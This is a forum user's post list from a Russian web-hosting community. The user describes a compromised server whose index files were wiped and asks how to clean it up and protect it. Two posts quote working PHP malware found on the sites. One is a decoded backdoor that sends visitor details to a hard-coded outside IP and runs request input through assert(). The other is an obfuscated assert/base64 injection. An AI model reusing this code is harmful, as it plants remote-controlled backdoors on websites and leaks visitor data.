Jump to content

Z_Design

User
  • Posts

    0
  • Joined

  • Last visited

Everything posted by Z_Design

  1. А это к нему не относится? в опен карте какая хурма
  2. Какой антивирь порекомендуете для сервера? я использую щас только manul от яндекса для проверки
  3. по факту с базы он стирает информацию? там следы оставляет? или достаточно удалить схожий код по сайту?
  4. Вот такой код получится, если расшифровать: <?phpif (isset($ibv)){ echo $ibv;}else{ if (!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]); if (!isset($c_["HTTP_ACCEPT_CHARSET"])) { if (preg_match("!.!u", file_get_contents($_SERVER["SCRIPT_FILENAME"]))) { $c0 = "UTF-8"; } else { $c0 = "windows-1251"; } } else { $c0 = $c_["HTTP_ACCEPT_CHARSET"]; } if (function_exists("curl_init")) { $c1 = curl_init("http://109.236.81.101/get.php?d=" . urlencode($_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]) . "&u=" . urlencode($_SERVER["HTTP_USER_AGENT"]) . "&c=" . $c0 . "&i=1&ip=" . $_SERVER["REMOTE_ADDR"] . "&h=" . md5("5901ac288e42519524e863ffc803aa04" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] . $_SERVER["HTTP_USER_AGENT"] . $c0 . "1")); curl_setopt($c1, 42, false); curl_setopt($c1, 19913, true); $ibv = curl_exec($c1); curl_close($c1); } elseif (ini_get("allow_url_fopen") == 1) { $ibv = file_get_contents("http://109.236.81.101/get.php?d=" . urlencode($_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"]) . "&u=" . urlencode($_SERVER["HTTP_USER_AGENT"]) . "&c=" . $c0 . "&i=1&ip=" . $_SERVER["REMOTE_ADDR"] . "&h=" . md5("5901ac288e42519524e863ffc803aa04" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] . $_SERVER["HTTP_USER_AGENT"] . $c0 . "1")); } if (isset($ibv)) { echo $ibv; } if (isset($_REQUEST["p"]) && $_REQUEST["p"] == "8bfdcec8") { @assert($_REQUEST["c"]); }}assert, если что, выполняет код, переданный ему как аргумент. Этот код скачивает другой код с какого-то сервера и выполняет его. Код получается с этого адреса (адрес зависит от многих факторов): http://109.236.81.101/get.php?d=%2Fparser%2Ftemp%2F[...]&u=Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F41.0.2228.0+Safari%2F537.36&c=UTF-8&i=1&ip=[...]&h=0240065be4f4bb968b324c70a15ee7eaIP, судя по всему, принадлежит этому хостингу. с помощью чего расшифровал?
  5. а дело в том что есть и самописные сайты без движков, там полетели index.html В общем спасибо. придется парится..... а так и joomla и wordpress и opencart везде где лежит файт index даже на глубине где то и то изгажен
  6. Как можно защитить то index ы то? т.к. щас все подчищу и вдруг снова налетит. не подскажите?
  7. Спасибо. Т.е. по сути скорее всего работа чувака с хер пойми откуда? вряд ли бы русский регался там. тем более с города армавира то) были подозрения на конкуренцию)))
  8. Тех поддержка просто капец. Цитирую: Здравствуйте. На указанных вами сайтах index.php имеет нулевой размер, вероятнее всего, их взломали. В данном случае могу предложить вам только восстановление из резервной копии, если они у вас на сервере делаются. Вижу, предыдущая была неделю назад. В логах панели нет информации по взлому. Похоже, взломаны именно скрипты. > Как от этого защитится? Своевременно обновлять CMS и размещать сайты под разными пользователями. > уверены? В том, что индексные страницы пусты? Абсолютно. facturafest, вижу, уже восстановили. У royal-hunt в резервных копиях нет index.php, однако он работает с index.html. Выставил в настройках сайта через панель ISPmanager. К слову, facturafest также отсутствует в резервной копии. Я бы рекомендовал вам запустить задачу резервного копирования и убедиться, что нет ошибок. > Может быть такое что это с помощью sql запроса почистили? Крайне маловероятно. Только если с помощью SQLi пароль к админке нашли. вы говорили cms а на царской охоте и движка то нет. Здравствуйте, пароль из письма об открытии к серверу не подкходит, предоставьте root пароль для доступа к серверу. Пароль не надо, ошибся. Здравствуйте, во многих файлах сайта есть вредоносные вставки, лучше произвести восстановление всех файлов сайтов из бекапа. Вот такая тема в index стала: <?php//###=i=###error_reporting(0); $strings = "as";$strings .= "sert"; @$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUgcMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFyxnJHbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXGgcMvtunKAmMKDbWTAsJlWVISEDK0SQD0IDIS9QFRSFH0IHVy0cXKgcMvujpzIaK21uqTAbXPVuYvS1VvkznJkyK2qyqS9wo250MJ50pltxK1ASHyMSHyfvH0AFFIOHK0MWGRIBDH1SVy0cXFy7WTZjCFWIIRLgBPV7sJIfp2I7WTZjCFW3nJ5xo3qmYGRlAGRvB319MJkmMKfxLmN9WTAsJlWVISEDK0SQD0IDIS9QFRSFH0IHVy07sJyzXTM1ozA0nJ9hK2I4nKA0pltvL3IloS9cozy0VvxcrlEwZG1wqKWfK2yhnKDbVzu0qUN6Yl8kZQxhZwZ2YwtkYwRjZF9aMKDhpTujC2D9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyASHyMSHy9BDH1SVy0hWS9GEIWJEIWoVyWSHIISH1EsIIWWVy0cYvVzqG0vYaIloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cYvVzLm0vYvEwZP4vWzx9ZFMcpQ0vYvEsH0IFIxIFJlWFEH1CIRIsDHERHvWqYvVznQ0vYz1xAFtvAGxjZJSwZwt4MGDlAGR5AGV0MGt2Z2MzLmtjZ2SuZQDvYvEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqYvEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKF4xLmNhVwRvXFx7L3IloS9mMKEipUDbWTZkYQDlYTMuoUAyXGgwqKWfK3AyqT9jqPtxLmRfZGx5ZGZfqUW1MFx7WTyvqvN9VPOwqKWfK2I4MJZbWTZkXGgwqKWfK2Afo3AyXPEwZFx7sJIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXG09ZFy7WTyvqvN9VTMcoTIsM2I0K2AioaEyoaEmXPWbqUEjBv8iZGN5YwVmAv44ZF4kZQRiM2I0YaObpQ9xCFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9Vv51pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXF4vWzZ9Vv4xLmNhVvMcCGRznKN9Vv4xK1ASHyMSHyfvHxIAG1ESK0SRESVvKF4vWzt9Vv5gMQHbVwH5ZQSuLmV4BTH0ZwHkBGHlATH4AwAzMzZ4ZQAuLGN0Vv4xK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKF4xK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0hWTZjYvVkVvxcB30tnJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOcMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwuvMzEwMJZ4VvxtrlONLKAmMKW0XPEsHxIEIHIGISfvLlWqXGftsK0="));'));//###=i=###
  9. Добрый вечер. В общем как то взломали мой хост и постирали все index.php и index.html Как это возможно? и как бороться?
×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue. See more about our Guidelines and Privacy Policy